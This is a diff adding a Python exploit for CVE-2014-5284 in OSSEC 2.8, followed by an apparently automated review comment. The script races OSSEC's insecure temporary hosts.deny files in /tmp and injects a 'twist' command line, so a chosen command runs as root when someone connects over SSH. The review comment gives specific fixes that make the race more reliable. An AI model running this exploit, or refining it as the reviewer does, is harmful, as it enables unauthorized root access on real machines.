|
| 1 | +#!/usr/bin/python |
| 2 | +# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation |
| 3 | +# Date: 14-11-14 |
| 4 | +# Exploit Author: skynet-13 |
| 5 | +# Vendor Homepage: www.ossec.net/ |
| 6 | +# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz |
| 7 | +# Version: OSSEC - 2.8 |
| 8 | +# Tested on: Ubunutu x86_64 |
| 9 | +# CVE : 2014-5284 |
| 10 | + |
| 11 | +# Created from Research by |
| 12 | +# Jeff Petersen |
| 13 | +# Roka Security LLC |
| 14 | + |
| 15 | +# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1 |
| 16 | + |
| 17 | +# Run this on target machine and follow instructions to execute command as root |
| 18 | + |
| 19 | +from twisted.internet import inotify |
| 20 | +from twisted.python import filepath |
| 21 | +from twisted.internet import reactor |
| 22 | +import os |
| 23 | +import optparse |
| 24 | +import signal |
| 25 | + |
| 26 | + |
| 27 | +class HostDenyExploiter(object): |
| 28 | + |
| 29 | + def __init__(self, path_to_watch, cmd): |
| 30 | + self.path = path_to_watch |
| 31 | + self.notifier = inotify.INotify() |
| 32 | + self.exploit = cmd |
| 33 | + |
| 34 | + def create_files(self): |
| 35 | + print "==============================================" |
| 36 | + print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..." |
| 37 | + |
| 38 | + for i in range(300, 65536): |
| 39 | + filename = "/tmp/hosts.deny.%s" % i |
| 40 | + f = open(filename, 'w') |
| 41 | + f.write("") |
| 42 | + f.close() |
| 43 | + |
| 44 | + def watch_files(self): |
| 45 | + print "==============================================" |
| 46 | + print "Monitoring tmp for file change...." |
| 47 | + print "ssh into the system a few times with an incorrect password" |
| 48 | + print "Then wait for up to 10 mins" |
| 49 | + print "==============================================" |
| 50 | + self.notifier.startReading() |
| 51 | + self.notifier.watch(filepath.FilePath(self.path), callbacks=[self.on_file_change]) |
| 52 | + |
| 53 | + def write_exploit_to_file(self, path): |
| 54 | + print 'Writing exploit to this file' |
| 55 | + f = open(str(path).split("'")[1], 'w') |
| 56 | + f.write(' sshd : ALL : twist %s \n' % self.exploit) |
| 57 | + f.close() |
| 58 | + print "==============================================" |
| 59 | + print " ssh in again to execute the command" |
| 60 | + print "==============================================" |
| 61 | + print " End Prog." |
| 62 | + os.kill(os.getpid(), signal.SIGUSR1) |
| 63 | + |
| 64 | + def on_file_change(self, watch, path, mask): |
| 65 | + print 'File: ', str(path).split("'")[1], ' has just been modified' |
| 66 | + self.notifier.stopReading() |
| 67 | + self.write_exploit_to_file(path) |
| 68 | + |
| 69 | + |
| 70 | +if __name__ == '__main__': |
| 71 | + parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n") |
| 72 | + parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root') |
| 73 | + (options, args) = parser.parse_args() |
| 74 | + cmd = options.cmd |
| 75 | + if options.cmd is None: |
| 76 | + print parser.usage |
| 77 | + exit(0) |
| 78 | + ex = HostDenyExploiter('/tmp', cmd) |
| 79 | + ex.create_files() |
| 80 | + ex.watch_files() |
| 81 | + reactor.run() |
| 82 | + exit(0) |
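Review bot: The inotify callback `on_file_change` (line 64) fires for every event on every path under /tmp with no check of `mask` or of the file name, so the first unrelated file any process creates or touches in /tmp becomes the target, is overwritten with the `sshd : ALL : twist` line, and the watcher then exits without ever seeing the real `hosts.deny.<pid>` file. Guard it with `if not path.basename().startswith('hosts.deny.'): return` and take the path as `path.path` rather than `str(path).split("'")[1]`, which depends on the repr format of `FilePath` and raises IndexError if that format changes. `range(300, 65536)` in `create_files` presumes a 16-bit PID space; on an x86_64 kernel `/proc/sys/kernel/pid_max` may well be larger, in which case the PID the root-side script picks is never pre-created and the race cannot be won, so the range should be sized from `pid_max` (and the tens of thousands of stale files are never cleaned up). `os.kill(os.getpid(), signal.SIGUSR1)` ends the process by default signal disposition instead of `reactor.stop()`, skipping the orderly shutdown the reactor would otherwise perform.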